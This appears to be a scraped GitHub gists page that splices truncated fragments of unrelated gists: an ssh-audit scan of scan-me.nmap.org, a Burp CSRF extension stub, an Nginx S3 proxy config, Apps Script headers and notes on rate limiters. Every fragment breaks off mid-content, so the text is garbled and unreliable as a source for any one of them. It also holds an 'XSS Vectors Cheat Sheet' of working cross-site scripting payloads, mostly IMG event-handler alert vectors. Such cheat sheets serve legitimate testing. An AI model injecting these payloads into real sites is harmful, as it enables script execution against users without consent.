@mattfoster
mattfoster / ssh-audit
Created April 23, 2017 15:48
ssh-audit scan-me.nmap.org
% ssh-audit scan-me.nmap.org
# general
(gen) banner: SSH-2.0-OpenSSH_6.6.1
(gen) software: OpenSSH 6.6.1
(gen) compatibility: OpenSSH 6.5-6.6, Dropbear SSH 2013.62+ (some functionality from 0.52)
(gen) compression: enabled (zlib@openssh.com)
# key exchange algorithms
(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
from burp import IBurpExtender, ISessionHandlingAction
class BurpExtender(IBurpExtender):
    def registerExtenderCallbacks(self, callbacks):
        callbacks.registerSessionHandlingAction(CsrfSessionHandler(callbacks.getHelpers()))

class CsrfSessionHandler(ISessionHandlingAction):
    def __init__(self, helpers):
@mikhailov
mikhailov / gist:9639593
Last active November 10, 2023 22:04
Nginx S3 Proxy with caching
events {
    worker_connections 1024;
}

http {
    default_type text/html;
    access_log /dev/stdout;
    sendfile on;
    keepalive_timeout 65;
@jfcherng
jfcherng / st4-changelog.md
Last active February 10, 2024 20:21
Sublime Text 4 changelog just because it's not on the official website yet.
@rushimusmaximus
rushimusmaximus / gmailToSlack.js
Last active March 2, 2024 13:00
Google Apps Script to post filtered Gmail messages to Slack
/*
The intent of this script is for posting filtered Gmail messages to Slack.
This script could be used on its own with manually-marked messages, but it
is most useful when combined with a Gmail filter. The script assumes that
target messages have had a specific label set on them and have been starred.
The Apps Script can then be set to run periodically.
2015/02 cmyers, rush
@kurobeats
kurobeats / xss_vectors.txt
Last active March 20, 2024 13:47
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
// Includes functions for exporting active sheet or all sheets as JSON object (also Python object syntax compatible).
// Tweak the makePrettyJSON_ function to customize what kind of JSON to export.
var FORMAT_ONELINE = 'One-line';
var FORMAT_MULTILINE = 'Multi-line';
var FORMAT_PRETTY = 'Pretty';
var LANGUAGE_JS = 'JavaScript';
var LANGUAGE_PYTHON = 'Python';

Scaling your API with rate limiters

The following are examples of the four types of rate limiters discussed in the accompanying blog post. In the examples below I've used pseudocode-like Ruby, so if you're unfamiliar with Ruby you should be able to easily translate this approach to other languages. Complete examples in Ruby are also provided later in this gist.

In most cases you'll want all these examples to be classes, but I've used simple functions here to keep the code samples brief.

Request rate limiter

This uses a basic token bucket algorithm and relies on the fact that Redis scripts execute atomically. No other operations can run between fetching the count and writing the new count.